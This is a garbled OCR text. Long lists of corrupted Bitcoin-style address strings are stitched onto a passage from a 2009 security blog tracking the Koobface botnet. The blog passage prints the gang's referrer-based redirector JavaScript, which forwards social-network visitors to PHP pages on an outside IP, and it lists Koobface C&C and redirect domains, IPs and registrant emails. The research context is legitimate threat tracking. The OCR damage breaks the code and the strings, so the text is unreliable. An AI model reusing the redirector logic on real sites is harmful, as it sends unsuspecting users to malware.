LATiKSofeETmJyHBJ4RYHCp9fMhpHgg21 
LATjKtg1CKzZT48ROFkKdWWBsfZNr8qsENBg 
1LAtK7jDVeL3PRHgMWGu3c6wPRcS9ovu7Nn 
LAtkFT7LT72iDvxKU8USLFxPt74x9p478M 
LAtKrptPURS9Xct77x3QFJdq3C98p8atj4 
LAtLuJ58sSMGmJoAjxkDTxqVftCmhQPy5kY 
LATN9a8sss7yEGNeXgso2KdzcgGZp73g87 
LATNspGkK9X3w3iCki2xEKKNBpkEwX4zKU 
1Atnv612h38ANjfL4s5peqM7vsZRAmSCfk 
LAtnW1NE7F6eGXywRcKnPRHRSd81R3kZPc 
LATOONpANjzrfQNfkmugsk4wTbXE3ro4HV 
LAtP6NWxELAb9Vsz111hdFcp8qb8WEé6aTa 
LATQjBtWQNffr5tWU5ru4vhyxH4EdYWhCs 
LAtqWVG1FXxEvU1iCd4ZgE9Rc6rKvfRLYeC 
LATSYZ8jbE5YgUZUxqFbg4w3RDKf1UtXET 
LAtT3GQntfghbtVaZCntbdEBlauYb22Ada 
1AtuEFCKSDrHEDwQvWiZuvARCQHHTGzxMr 
LATWH7XFJe6XeYV8qfPzzuFwXe73ukKmZ6 
LATwqDw4ToN7x4hYSFvLU1crBA4bxXtz7BG 
LATY2sbZquCGnTtYnAVM654vZkGnm7Uxj 
LAULNn6cUj9uTr8p2Shn8c6zktbuu3qLYC 
1LAU4Bdf13bCkc2fT kyAQc4zA25kuJQbu8H 
1AU7GcB3xMXeN1le7ZAbi8Guv641ofxi4JX 
1AU9c5d4D5ZKZ6JNgfXH8c1fJ|LDKMzXysXx 
1Au90CspgqQHtYZFSLrTvkKUnNWVQE64TBYz 
25452 


 ieep://uhois donaintools. con/61,296.117.28 
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| http://ahois, doneintools.con/94, 212.127. 149 
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. http: //ddanchev. blogspot . com/2009/06/fake-web-hosting-provider-front-end-to.htm 


37. http://ddanchev.blogspot.com/ 


5.8.11 Movement on the Koobface Front - Part Two (2009-08-19 11:27) 


2548 


LAU9gejrLgqxWul1KSJiSxCjZ9PY7kPjGZ1 
1AUa5naJXGY7dRWkwaYTt3RayRhjjTT1KR 
1AUaDJu5T6pfBfVY4PELinaPHV15Vr1DNL 
1AUBXBxsPKHFReaVsU2CX3amej6xi59XBs 
LAUdM1LY1XC7jESMM2DNVEJsv82zAa1xSN 
1Auf1ltEon8QfpLNgypUNz4V7vftqmkn3ic 
1AufpZdUf2JiaPMX96h3yiUcVwkhnKHFxU 
LAUH65X6itxDgmTJSPZZedNG9sxWZnNBmm 
LAULU5UTfUgkoVXe7 1lusKSBVs8pVL63ee 
L1AUmyVgSE69wC3k5v8zCS4bZe2UdTrHQi5 
1AUncuzniWbYGQEsaexgMbK5XLMiw8tGso 
1AuP934tGjy1iu9DiwWDkPpvySPemplie2 
1AUprhi3BFDB1rw6alVX5cKpzdQlgUm38v 
LAUqqgDHe982HsermAgJDhUBTLHeWp8npP 
1AUqzuZ4bu8Mvdzp9w7YBZm3oy1Zwil5cm 
1LAurQTjnylqcmNfTff25Kfr7474gilqWpE 
1AurvfaFxLQT6PifsWriVXG5A2you6XM8V 
1AUrz2SEA9pXrSDEG1FhyfTgiJC2gWLUtp 
1AUsgcPfenGtaMCynTpFmiNUZbwQ2orpLR 
LAUUn6yHu3Fbd3gxjCrlUec8n8pdRmxZSw 
LAuvaCUBqFXQXQwCZRxcmzYkMGtDTgn8K 
LAUVFeE1g3CxAjosdJ5XbXVpPLWpL60k3N 
LAUviwVUcKuDfguXbvgnnix2sa3c5gkKFi 
LAUW5cTP3BaAWnm9VnMywuEYKBMREt5Bxz 
LAUx8LU07mwRyh51q87dUcdPBYp231)bRu 
1Av2erqrT9JKMgt2aHcLEdAqNq5iHgxDjx 
1Av3uWWd8Lua6éjJdaov4v4xqy7BMxqhuM5A 
LAV4kxxNj2QrBJ3qN8NVAWASp9WP2zJ9cXr 
1Av5aMzPys3HwgsHf3tHxxX2axHSoRInnjk 
LAVaVAXqxUKSQavSVWoi8QMtePwVhLS8AY 
1AVcbgn3QJGJkDehF5LhcYhp81UZsZ9dWv 
LAVdwcwApYU9T5AVQPFGuekeKxSbGnEtWz 
LAvfZnii4dBqRxAjYXMBD55LmgT8PtfgZxh 
1AVh5yazh3dTqQfjaQHesD] puEtqHQEcsh 
LAVhppDXk9bdnXhRaGFTINFMYiox8kj44ma 


25453 


LAVJPkmJBFJA9GutU91P6cZ8st63XSyWMe 
LAVLDzeoabzAYGPMPcWvW1BMFAQ5JnPNUE 
LAVmMTUGgMW2xYKNEem ]bbiWsleDEvfzHDD 
LAVNZRChJGhJZaeBm3PF7fqKMEYLjxn6xn 
LAvPDy4aXp3nu7kX4qj3G8kPSKTyxuBMhS 
1AvsV8cbvDDPG7HkaWEB6QoVtG39uBU5cr 
1Avsxjepw8iqfismTPaZB22u2y3NixP8NX 
LAVtSRile45m3t6oiksjtZ5gxj8iToZfyv 
LAVX2YupaSHVERQK2X5tRBrxhG9dBlqxyv 
LAvX31RYya3Ty5cLler4UHf6ia9dMNNvTV 
lLAvyHyuoKxsTXLYX4ZmCCs6zAZDCgqyxtB 
LAVYTGEQzxxmJwyQEkMdcHDgaqf3xZqaRwQ 
1AVZHeb1fCk2rN2DRLr8RvickAznRFiLrQ 
LAVZMrp4xBKffNCP2xjLmgqZMCxK1XEXauT 
LAvZPzpKXJ4zR3kCafee7SAuyP6YnVGhjXxX 
LAW4iWvBgLwzyqumLuRowbDTJCL9E2o0bqE 
LAw5n3DiWSNrr427mj5HzozU6iC7SkMjWD 
LAweebubC8izsT Irg7MHydL67r3b9rmwr4 
LAWESZMu3MtalkgxQhLsjE6R30iIWU4mYpD 
LAWeVuXHMcXMS2Wweao7B2UHBdYPEfZXBG 
LAWGhV6HJ92HU8khAYwWXVS1Bn4nAPRBehK 
LAwhkZ5vKcyg4N7JbwN5RYdARKsrB1EiFa 
LAwk6eWSUbgPcYZGdT5YH7Z3SghbFLmxds 
LAWkGovLMc4DdYQuEvmLC9F3wiDm5en9zZ 
LAWLsKkdjHDGMVsfQqbemgqh3hXoAWpmspx 
LAWpmqwnSdoouLuCxZ6fmeSBNyVroRAZKK 
LAWR3ZjHEEA8PPpbZUSbZfDFXFrWwxXRm2u 
1Aws1GfDqRsfsBpZbED6ApGSk6zPQDMLEN 
1AWs6n4QyST3UKQHMBu4yCQvvZXnbRKNB1 
LAwWV] khfSnqnfqaEGJDeiT7X8qzkFZrRBh 
LAWWERBcvUZUGKoYqCXWUXg8eQZ6Vik9gn 
LAWWQo02RCb1WVDwg1451vnK35GpN2nFOWX 
LAWx3Kvyy1Q78ZHX1FzbYxJPGe4AHyVTU9 
LAwxpuokZ3iTAzoL6SjbcsunkCHVUavjNG 
lLAwyfmyPa64MkvnjHVG8SmMDMWQ7PGhp27X 
25454 


LAWyNFLwzHyF8Z8qXVMSW)jKBo1dYsY8bE 
1LAwZ7bugbSb4dPZ9jeGAcPHexrqaEwNmBP 
LAX1RHv4V22VuMPLLbKh7umU2jTmcRV4TX 
1laX2zTKBnZrtxGpPA8j77V2FfFCnN1EGSib 
1Ax4ZamMqz4ehR3yZqvaKD8SpnEeh4MFA} 
LAX6dUEah61fDtBBntLjbf8wAamis8BRIc 
1Ax7sigiCzgszWvVUYjzWuAkycS4XWLUQ7 
LAX8JaiSCQsFJLL7xqqPcuUEeeHd3Mtcb7 
1AX9S53RRzPjbxWBEXSM9Y8bppP9QhHBNge 
LAXd8XX6W5svkoBaR5m2)4476NikYoPtUv 
1AXdzJaT3hwKqXyQjeEPWb8DYDvkrizp1z 
LAXEYZiP5VtdKT LpcXwIcXhNNkwumiyqwa 
LAXFNkK4CN7PKga9NGsxXekiQnq7h6ebFiDc 
LAXhPZj4vYvcz72zZ1dphK8Sh7sEY73C46 
LAXKWHNxppLNsb7HP3dpV9pZtAgep7nBRJ 
LAXLcHvkhnbfbDm2LXo05K5 1 1LMHNU1oBjQeq 
LAXLURHNQ8iVR4MPZJ935rbGPjG3FgK2tb 
LAXNQvRxpLXLF2z3WrrREq3LHgdbpsAm38 
1AXR58CcTcsTufAVFA8d67ghKSbeRk21HT 
1AXRrEso6s7f51LFQ4823LjyuMAhSMyDue 
1LAxUdGxcrpVVivBcB5WmZ7V7yRgMR1f31S 
1AxvG3LienAPDhUccdNNoo5TbUC12wNnS4 
LAXwZhBRZSXY1FeJ4m5RHuPrSsu8zT/7rNg 
1AXy3xDBnPBKt157XrZYvHZq5rqvck3rkx 
1AXyj9qldQmjjRem84yPvEXTMoYs42sFxy 
1AxzfiU2yqtWKiMm5XyLKFEGxKetukaGXt 
1AXzKd LhuieNscsh6FfrDYoajHti7 9wRDZ 
1Ay2paLpsp5FKBNz8biBXc1VNFevRiX3Y] 
LAy8bqwJB5jHNGiqD8mhPnDhiJMS96BurL 
LAY8rBKfev6bjkG5iMn2itg8r4hTilS8e7 
LAYAJYOV16NGkfsjgqcxmVXbUGfgZB3645 
LAYAVMiXStEXCfHyvXNrtSM2qKSCZ6Syxc 
1LAyBaDLN3rgHKIcxXh5jceqUNNSCwrjWJ7 
LAYbJKe4RnxPcHvjSHXRU9dcnaSpAgsSMP 
LAYdVW39EjmSvgVSWkoY5yCEyHSPjymKoC 


25455 


LAyELjo6rn9c9vkFout2nrLNF6VdTtqHN3 
1LAyfwbkc1QCruBRdAThzjl1NNQX4p3BwGbL 
LAyFWWHQS20GKJtyUDNdPCRoy4EeHsMesc 
LAYfxEfpQS8KFWnZoglnTqrwxQ7BmgPKxw 
LAYG7a049BjKtUapgj8cKpK9rQ9SkKNNWNT 
LAYHoXc4rYfg5K1SbQWTsgoRv2d2TTDjwL 
LAykVCrfwWxLdYXQKVhpsjwHBduMvGw2fr 
LAyMYYzopan1p6f3ph8rkx44Ygpe1l3ZjMW 
LAyNkrhnkyDrc2JkdJQGJsD3AHCW8xdqxV 
1Aypcoyx7ZRNyNfi6pU98UWWgR8hxATG6t 
1AyrKPzidv7RpmR56UcnJmflAvoqFPffhB 
lLayvbfDArpRjTVHyvY6pY8v1Mnokun8WD 
LAyvh6Qk37G66ZkKRMvVNYisFgPvgoHCEHVA 
LAywgQ6zYZeNUaQ5vzZfWQ6PQ3pCPWy3EX 
1AyWpbs85cEK3zyUai3vNDAccvp542rfRG 
LAYXJqogUG8qT4wZHNtxCSCuk7ezNCLT1 
LAYycm7vww5x2iLgSGmee7G8i4Flv1ihvKZ 
LAyYSSQndLGzkiBQ7u7dazVbhMGuZjw3dn 
LAYYUPZwgqErDMZq6VHMB8RiT9UZnz8u7jWQ 
LAYzgZitC4zjeJZ7KCWGhcFyucXZVVUpbw 
LAYZjADZo7guMMqY2H3BwbAvtPiQYpngXW 
1AZ2zsgsAXyF3rHbSTIPKYPTUHAYivtHt6 
LAZ3F6SYTYSdHqXQsDVAJ9VUEAQKESEWSf 
1LAZ6Fyt6VTSeGULDG8KVBDc2dSKW2MH57E 
1AZ7eyuw5YucEaqvdwWCjioMRqg4jdTtHEn 
LAZbjMhiTpTdzVaYdrwiAf35SJ6Th5X4bX 
LAZBqHzZGLb29HbBsSof4zFPen3JZn4zqnf 
1AZelqrt2YALBWFURag4PoMeGC761P70el1 
LAZfA7UJb7rHWnwSPUZTiQyJNtUoTFAndb 
LAZHF2GN22fYGMsDEivKndonvXWmDtWaDS 
LAZiITDBMVRcStQWH9FfVUrejs|KNMYBrGXt 
1Azj2voL5AnDnGeND6DxjUVtv5MUNLkcok 
LAZJfFZ2gCRN2cAFqD2HL5bgsrtb37gsPwm 
LAzjghh1Fft2cFPL9Epcl1Hho7RduQcQKMM 
1AzjGSZBrb7L4cvbBxkP4Ne1821VS8nT2z 
25456 


1AZnbSzbMRrTBrSSBqYkKM3m860GKFnjMzB 
LAZQivuEsDCWSNxGmp93Cpmc9TyPRYJHFCc 
LAZQtYi3Vzpb8naToASUrzsmwjrqbtuNYV 
1AZs1dQ91rlubC9CjJD12cdKhX3vzwx4PdX 
LAZtfMh4fz2ZCpekPkSpGbojjbPfstvCqC 
1AztMxcvGTeQtboewghcCfiLbYx7aul1Nra 
1Azu9XcXvlgnned8sE1m5nhf14z629yHEW 
1LAzwGB3qyTdGQdDHBekfNDiBtJLEAAntsw 
1LAZy2S6jJ5etrbvQSEoORvjJTDKLV4hMj2t 
LAZYNUTqhD3i3KaslctRCpykjJKq1cNuxGo 
1AzYp1SG7bBnbGEWXCCo6WE70z9xG9k2Fh 
1AzYtvopx7GRYGfZ4rwRhUzepUgxXyntboV 
1AzzY9W2VgBi7uU81lvY3iIMV3hWZKM5bKF2H 
1B112juah5rHVVxb9M7Npklig87wnYEW6F 
1B15WhoJ5fzJPRmThjHzwaNprFaqbyS1sq 
1B17smbcSPGCBHbEEpJpKXSHZhQdYNskYq 
1B18nrdh8myYjY1VpgfhGueKKTMQ2nkEa6a 
1B1bUqRkni58qgDV9My58nmBb6bpmsDL3zFF 
1B1CWj8e1GwWWCcoHY6HYxKKZVfftN85VbN 
1B1Dq7GtPwqNryqLcoRVmmmBcP67qBbLS7 
1B1jqaRYohqqQBRNUXr2UybmkptLS7wDT 
1B1Lj489cWJ42Zjx5iGZZJagNS3fTPQF8r 
1B1QM4rnXZLojhicogCbZKaVy3vkjpmHaU 
1B1r3Yr2UrAcYUMGUH8FewX992Wis2YtQz 
1B1V4X7SghXqB5eZcrmGVsuB3HBetE3qX5 


1B1wRP1mXZ71GB5VAuTSCmDUacMg84Mkbg 


1B1YcYZZsAUJbQtMBXefB72n2tBbM1L2W2 
1B26qccdsbcWywNnCa7JGFjcPQ7vZsbUZD 
1B29djGoiLXdDXYrrsViYXCmxVwXsnfEFD 
1B2B5aNpmgqnVxx2qSy9677fZtXLiR7gpsW 
1B2CzzgtxSptTt68H9g4YVcR4LnSXu8M6E 
1B2DH5Pi9S83C5GGiSILVjJMViI6UhWFa36s 
1B2DZKhpbKHLx2ddLQHxe4Yd5icuPHUiEP 
1B2ECSgDPeBk9hJFcZTFmukcuFevdRXwcd 
1B2edQLkYu2vuM3tnNe6MSuECsiBZas2he 


25457 


1B2fiZM6Yr7jt6Yv4d3xLs9qjDjsoPpPaG 
1B2foZABe6bTpaxBqZzAaUgzyjJ9PEVntm 
1B2ikx4M2omHkjvLHySvGu145juoFxxX4wK 
1B2QmyE8qeoBKLBjDF3Mqz76jvibhU91t3 
1B2rPzvfpdvmiEiJuZiAgGm1zzUU4qtzgq 
1B2rQCkAUepoD1v8xd48kmhVveyr]yqcf4 
1B2RQYvnMbcZaT5D3vjJyaMpMtucCkpiSER 
1B2syWdTEHCVhiGJCVYBFXkH72Chefuclk 
1B2vZoXSRigFGMCx4PZXS7j67LyTyD59qgh 
1B2XevaSv6HZH3te2n9twoGNhHHajD8RcW 
1B2z7usJr7jLZuJpMjALVxJ2vKibLfbi2P 
1B31ibvNHDwQDfMhyZdhdM2XQg9vsGwkon 
1B31rUWnDPgTzf21xkHHxGUgqyFhQqjtD9w 
1B38W7SnGmFq9SqwLhS6érSM7Ny1zpYxDSL 
1B3aFiKivDQ2nHnADHZzqoJkQLCZQU4SnV 
1LB3athY7qxA89LQ2f2EZqQSvojRt6v663t 
1B3B9FHXsJ372T9tFTH5psk9dpqzDDpq2S 
1B3DVamPpZPLRB7u8ggJzRgEneAy4FX6Qu 
1B3EtSuX6zmMR1DSDTkRdF7JHmoSENPJPUC 
1lb3Hu7EVLSWHVwzEfCDE8eh72R9ZqFajJg 
1B3KxRHCcofj9hWFyCCSYNpMiUKuS8ThNw 
1B3LfHHaqfSst930rQh2aJYh4cNZnanBmCh 
1B3RLsoMnaUnZZMkQmSHNffuPxyDZC5zTp 
1B3SqH89qakaMwdrGx8gt8bb1Y47upjTB2 
1B3vjM71oKrzvfJHTTUoJjE19ePP6insJT 
1B3w7MDtt1DGWahLog8NZNCMtJexiAei9e 
1B3z22062szoYDKzjhf6cdszGf9DRK6JiZ 
1B41AqWELSPfVi1VVaFxYA6BBKJoEg51leM 
1B46X897tXX8zbLrvcAhvnHdapcrq6VXM7 
1B4m8V7fGANT9ctLoBbMYVTxXv1SartCCo 
1B40Xjp5BcPK185f1ZgW76BQZZRfKVqDOf 
1B4qd66yrmNo482txYUhhZqkP68WJ6fDgB 
1B4SjCEppw4jgJLLH6WHf7zzdp5gMLreqB 
1B4tTxtaJ3VPSS5ASkpo5c7CPuMvWZogrrM 
1B4wuXbhNRsf7H6EMuqwWWu2FG3jRwWVBwQn 
25458 


1B4YVK7akb1pu9bjz1dxXbiVnhaRiSnZiWs 
1B4zdLAYXzVgzbi2iCzBEIN8EAb6cdvUfu 
1b55hK1kFLTV8Db9uaFzHTterozeyyKrp 
1B58CmceR7A9zSCtzgGp5EHy1lcVT8Kg3TM 
1B5aoUBaDRFyC7PvBY1lemi85i17g4ZYPLy 
1B5awXqAFdseJCD4FkrzRZTvZrQpGHvT5H 
1B5CXA1xcAKrLsCqhEnUUZvtxcBwCXQMd4 
1B5DjhYEpc5WoGjuPAZUGGoHYa1pf2363M 
1B5eX99uLnYoihVok5DgihzgC3JmNZeVNA 
1B5fxovg2QByzLAgtzMRgZv4ccdX92XVpQ 
1B5grEkKH8ZdhhsPGpBUBtdw8KUDyRMRQ/7f 
1B5Gtp75ebhSqwjqYkeE8yXHhBYloiHmfA 
1B5iLRfD303hzF XNNQLXBW1pGzaqGkc4tv 
1B5Kd9mrTSWEQTaDBHKBN6GihCGZmxXm5zx 
1B5LYQkyhm55uYVXFcKzewhWcCaeKiaby1 
1B5pJUXJWaPSD5wN1jAVgqyZEZhLFCsJrQz 
1B5PNWhnPrLuNvyMekNigPZbEUdEgP7FW4 
1B5rHru646rkYKiY41NJwt5wpRr9ycHUNT 
1B5tLmxFZtwBUodZLTra5h2TWRWQMDDThM 
1B5ZLKAvFoakalFAsHp4dwsTqMjSBFgxKy 
1B61iQ3v1XLkrdxUgnRMpPie3qRsbycQy8 
1B65zyhvrMXxPFgAX2G6rGpuq359xbrPiA 
1B6A00x77SzpifFoT 7swji6VKFKF2SbirC 
1B6aS3ZSQ2m5vSFFqoWwMAhD42A56zqRBH 
1B6AU9PRNGsaoyxuMMjnxCuJFPCHvjMtr4 
1B6DAPakUof8cZQQPwohw538bMLHu3H1py 
1B6DxWcZPH87bHgKkbCiBgP3P2zq3Gb7nv 
1B6EEcZWvGAIM5n2jLt7u8gEJ6t5ezjG8N 
1B6fLBvS1cDyoLiGoVyrNRSMTxLwHcgvPy 
1B6gL7fWsWtgnTQ8wVjhe3Lvkkh2h6tFvZ 
1B6Po8cd8VCgmnt7U6qNXZ3)fqFNN1kbS 
1BOR6VYddYx6Kb4rzzUmxna4y2gZvGHhk 
1B6Su2CvYo8 1riiYmMwLvfjjmLwXuYrVxzF 
1LB6VgNRjc9kEFk8iBHow5E7xUrU20ssLbZ 
1B6Ow5Nc1K1Z6jSkUxQDsnmhp7LMKL65A86 


25459 


1B6wmoKASj1Yn7ENphgwn8Cs]JFgNnSKFjF 
1B6X8r2rsU3HKhtgoRgKqpn5X7ZH9ExzG6 
1B6xRGwetUYXVS25sif3ECUSkEsvGi6pqM 
1B6YrvKf5FWESANSVxXCLKkRWq7rmTvNHPR 
1B729nahidwbAKxkZR81poMJ7PWr6ZEhf5 
1B76Wy6ygQbL9QWa9cmZMuUGKGLtVq4g98} 
1B7ekN5rlqwr5Zkgikdf9VMF93Dyrs78Qu 
1B7LTzYgv7M4ijaJp7BbxYXCNLI1pgfaAfs 
1B7PY1lwVWokKwm3CSGvjBsrcETSj3zVoxXqb 
1B7QDp94hqdReSAxUK84N3rDCmPy3M9bhh 
1B7Tjwf2VKPSUx6Cf7wokKdg]5auvzXgSew 
1B7xcWfxG5FuFABX3ao9KMWMN/7zTzzvx6z 
1B7xkRMKZQJP8ApuspbCxirtGQtX1CBRMp 
1B7yQDAvVA3VEthWHUNj7xP2CpQRVzfUNnL 
1B88uUZpytDMP2VrjYdXTAmJWBrc3VnzmF 
1B8BDh4svtv41Z47XmHm1uoxka8wMFzRY5 
1B8GwZ40z1KGTbA42MWYBecrjv4cE76dxM 
1B8hEw9hxryq8iukXobv25ZCxhEbJUNAdd 
1B8KbK7EgmT 7UGfzh6JmAMsxXsV4Dp6byxP 
1B8KnxDynENcqNjgB4z3TjPVZ6HX2aP7xx 
1B8NhCLY8fiLcVo3yShg8mc7Gk7fC8Maa5 
1B8nmMGEEVQu54QxXeEytkSCtKvNkKTpE537y 
1B8RXHLsomVnsjDPYb8zv1FcyBfh588TMU 
1B8tGsYFCLgrEPsQan787i4zETeC5 3ty6g 
1B8UtyFAbcj9uGyjKc3KFKAH8mXYRxzZDbL 
1B8XCVysJjMBJvwFpm2FQ5VgbBpP4h6Let 
1B8yHgUmt122tJnXrHsobcjCKsH4na3cG 
1B8YNFzmkzoamfPyjXFQaKZNk5VkrEKubC 
1B95sPiaN28fywAoQ5HB1bGSNSc345dFva 
1B95Y4zAeKSkdopHUXrBQkKXPN4QB3vcXUY 
1B9bDPbacqj3JyXBje71VnwGHPEPq2QRkh 
1B9cc2ZCfzVrNngSmhfyfvEsdFCaldVEGp 
1B9gFiqygNB1x523k4fFZL7fRZV5dT14bw 
LB9Hvnhqh9McWp2DvHWpxYjrjm8vADXA5b 
1LB9icSJQMc45i5)KMHkKQ49kWyUP1LICsGhm 
25460 


1B9moetwVR2bpV2hKpr2UnNkE8zk5Vu6ihn 
1BONJgmtdP86upvLxX08122U 7wtCfmyYuHx 
1B90tRUT6EOYwT Tu8gKPBFdbnFB16W)jJVE 
1B9P2Vb2CSUqd563CrFLcwPQWabdHtPm7q 
1B9ORSEsBjo3nKWMWYFZEJ8j46J54WZ2k52 
1LBOVtE4Ni6n46rPFCKuPXqoDattAr7gteu 
1B9zhesnxrdvqhySy9Dapxdn1WG5jaDyUx 
1BA212HKtMis7BvEiSMumGvzeCUGx4qSkB 
1Ba54P2KqbjbynfPdAUZ8kJWZADSwQRBuH 
1Ba5dV2wzDC3uyNbn3g9y5ivbxXgef5ZAZfF 
1Ba6mozmB7beR6GoFgWFWfK9FeQdSN8oqVi 
1BA7obkBVd9td3BHrkNQyqbDxWYatXueZi 
1BA7RX6PChhaJYiX5H4xjgQfx2bgQEtBMb 
1BAYa3ybjfteNYQnrtC25nnPnNfGww2Yyq 
1BA9k8kn4USREWcytGJtPGWHwrS3sFufXH 
1BaaazxABRmfhjVDedMDAaK8vfU9gQ]pAW 
1BaAjYmybVxVXGvdkMqRK6W3k8znFvkstM 
1BABhodGvawoEeUhMbxy7WUBxkJyLv6ymF 
1BAdhep32WKjpZqHJjUt9etji8ZMueQGQxU 
1Bae4fwR85hFJyKoFB3u9ZBKs3aHRYybD2 
1BaEjWeU8ftbrVf5tUbp1pj4RyPEbayYSz 
1LBAFLYi4UCjJPRdGCzuF6kZwoCECUmyBbS 
1BAH7eqyEymhyaipS5hNSkxs8zS4zK8hkx 
1BAhsP8aasWU4VcXbXeypQ8YadKxJAKDWG 
1BAi9bB9PKpNiIGMhqVVhYo4D2i0j7hGfpA 
1BaJX62Fc8qvEkECtaMx1r3Truae2oPzfk 
1BajZpVRZCb9E8UfKJeYvg9bMjNP8dRigN 
1BaLKhjzBLyb8X4xjWzdfYzs9ZMLwCfBcb 
1BapEGyBuyfLiJcQ)/DmMeCHZWXhoP5Ujf9f 
1LBAPEQWTTzjrBygv3EEoPindYFLs2aQL8o 
1BAPrxYMkYkSC9en5VssZLEmmC8NfGyPsu 
1BAsnok68nbSkx799r6WsDh8V8zZ]vj6pLV 
1BatCTb8Gos5Lmtg6FHVRTyrwGcXeYwt85 
1BAuAgxwpqUDf6quipANp69TJhgQ45rqeC 
1BaUdm3gueG4akbbaE9C1JXHf1kJk9TaKu 


25461 


1BaV8hdq9zfn6WLddgoUzRu3xRK1ujBdov 
1BavDEhG6Hq6bwQ6Mqgh69mNu4kKMND1ftG 
1BAvweSsocLNVRvRqTQKkE1GSeeAZybtC8 
1BaVZuSrVYwjideCVxhtUCjwPw3dVg7eWwT 
1BaxXdZbwYnuzDvmxqC1p55yle4wMMakrU7 
1BAxSAn48MjMdVnAdTFZNGD9uiilxTqexM 
1BayJaxxjYAeP4joScxXkY12JFLImy7aunB 
1BB6QgrtR5q18ncCeoHnW9uBRMKz7d34wW 
1BB6zwG4kBJ89AZaPMNw8ddgik8xivUoa3 
1BbAC1h5WDw8TnfwpVS4C3zZBK8nTQNCFmH 
1BBAfkewZDfw4zERPvFzCY9rZUFNDClavB 
1BBAoHPs TWHRTIDWWyZGKoshw6FfSpEiyr2 
1BBAy2BcCG8kzVNZQQvUZUskfqBwJSM5DP 
1BBb6RUeiqwUT2GJH1DNeKsru41EznDfRz 
1BBbocqqcN6obKtsZC9K4gHUrjpjacDuHt 
1BBCUGNk4mmWadP5chMwiwMmQ90c313)zf 
1BbDWvpfUPinCSMpSzHvrbvfVNrmUbaSxXr 
1BbeBdAgB26P7kMe6VQkiI9FNQ1vbqAnCZR 
1BbG7UZvtASFgk4hHUAuEbsi19ENCcRY6X 
1BbH8Vbs9CHnDo2brFEto9mj9o02fuAntsS 
1BbhoDTRLkYbrDKwNEHbCQar5n9ksVvp5u 
1LBBiq3jgHLiuhN 7NyhfwXzQY5nYU4sbi4A 
1BBk4ErPmqLuTN1XfKRSvR8NAWhNXyD7WL 
1BBKSVWo1GXJPC4gFYS8hgj1xZQwcZcdo6 
1BBL6x8VaghQXocVL6aG84QFSLMRkaSdYi 
1Bbm7WnspAHovKEYrh6bUtzDUiqUrztf1B 
1BBmAsZGEQfE8fddztubWjATBX3hNSYPfE 
1BBo5v160EHzugyLmvPhbcE5adbGoJxaaA 
1LBBPawKCYm5kjnzESZ9CxrHU3jJWKWfgPW 
LBbPCjJHXt8N4w4kQ3ikBFdgaSyAfDrhmiw 
1BbQexXteCT8DKn6JK8whlgqLwgn8fxkba3i 
1BbRw4nbzdrakAnZNCdzKN9CFgu4qQNTNC 
1BbtcykwZThdUoJ6kboVzvSzNmxkAJNWu6 
LBBVCHVY4Urg42XHkW6KbKx11wWWHjPLbhX 
1Bbwk2pBoQYgyPgmWYb2FUnFaUUyCxtNhz 
25462 


// KROTEG 


War abel = ‘http://85.234.141.92/redirectsoft/go/'; 
ar abc2 » ‘http://85.234.141.92/redirectsoft/go/'; 
var ss = '* + location.search; 
if ((location.search).length>0) abc = abci; else abc = abc2; 


var redirects = [ 
"facebook.com’, abc+'fb.php’ 
*tagged.com’, abc+'tg.php’ 
"friendster.com', abc+'fr.php’ 
‘myspace.com’, abc+'ms.php’ 
*, abc+'ms.php’ 
*,abc+'yb.php’ 
abc+'fu.php’ 
abc+'tw.php’ 
abc+'hiS.php'], 
ebc+*be.php’] 


var s = ‘' + document.referrer, r = false; 
for (var 1 = 0; i < redi ts.length;: i ++) 
if ((s.indexOf(redirects{i}(0}) != -1)) { 
var redir=redirects[{i][1}] + location.search 
if ((location.search).length>0) redireredir+*scdomain="+location.host; else redir=redir+' ?7domain="+location.host; 


location.href = redir; 
= = true; 


break; 


} 
} 
if (!r) location.href = abc+'’index.php’+ location. search; 


UPDATE13: The domain snimka31082009 .com has been suspended. Just like the domains 
listed in UPDATE11, it’s worth pointing out that once the PrivacyProtect.org whois records 
return to their original state, all of the domains are registered using the name Rancho Ranchev 
- from Ukraine with typosquatting. 


UPDATE12: A new Koobface domain is in circulation across Facebook - snimka31082009 
:com - snimka means photo - which redirects to the Chinese IP (China Railcom Guangdong 
Shenzhen Subbranch) offering hosting services for the Koobface gang as of last week - 
61.235.117.83 /redirectsoft/go/fb w.php. The snimka31082009.com domain is in a process 
of getting shut down. 


UPDATE11: The latest Koobface domains masa31082009 .com - Email: yxlvpe- 
woztjox@gmail.com; pari270809 .com - Email: baoyshzrcwmraq@gmail.com; rect08242009 
.com and suz11082009 .com have been suspended. 


The Koobface gang has also changed the C &C domain in their latest updated pushed 
throughout the past couple of days. Interestingly, it’s a [1]subdomain used in the Twit- 
ter campaign from July - cubman32 .net.ua/.sys/?action=Idgen &v=14 and cubman32 
.net.ua/.sys/?action=Idgen &f=0 &a=-531027389 &lang= &v=14 &c=0 &s=Id &l=1000 &ck=0 
&c fb=0 &c ms=0 &c _hi=0 &c tw=0 &c be=0 &c fr=-2 &c yb=-2 &c tg=0 &c nl=0 &c 
fu=-2. 


2549 


1BBxb73mBuhMJpWYukNQeCsrnzYPyTysWf 
1BBZM5zZczstpNtNfjRYVRVQxHkBvT5g89 
1BBztl6mJbUkqWgXp9WFZLYINFZfa7qjoQ 
1Bc3PUUMejCnHin9TXWFRZScXQ2pYVR165 
1Bc4BWR95bXDZFzmfHD3fzZUax3wA783vVo 
1BC59Eg2FNRU9YHbS2RhsXEZEKoEoEZi8Z 
1BC5HAVMK7onUb1WkwE9EgqpzzxoGN7gpK 
1BC8nUvVddTrxXaRtxXi3XCMuFnmCasgu6z1 
1BC8qqHZgoBWXVasLXwHpKH8Ucuf2iZteG 
1BCf5iXKBGfBMYA8LMVty9ohgV8S85jTfW 
1BcGMd1ALTZpFifu7hg T8UF5wL3NtUYHMu 
1BcGSct9HNE4Srf8XuzxRyJhNVJmLg8vmV 
1BcH7d6qoHW6jKmvTry6FAmKpiYZTBMeH3 
1BcJ9U3M6DG1mcxSrZxqV21HqrDYcLTA5d 
1BcKksLwWVx91kGefkzeDbnsievRZ3dfACV 
LbCMTC54U8abzqVaZcRBn41tl4SZBosRY 
1BcP9Tep6A7qPYUghPYT6UhFKjM6mrZEuq 
1BCshnPaCj1XEbjqUvcgSnSbCddzZuH4fi 
1BCtk8ZPG36]a8JLokC8QFmM3QmDbvzBVX6 
1BCuejF3gezPqqBm2FHzyGgmn7Bgfow4uB 
1BcVFUb6QmS]2Rngjfn44ABeWdDvxteg9c 
1BcWeV4EweKhVpAnDZpVBBrutyNLjNjXMY 
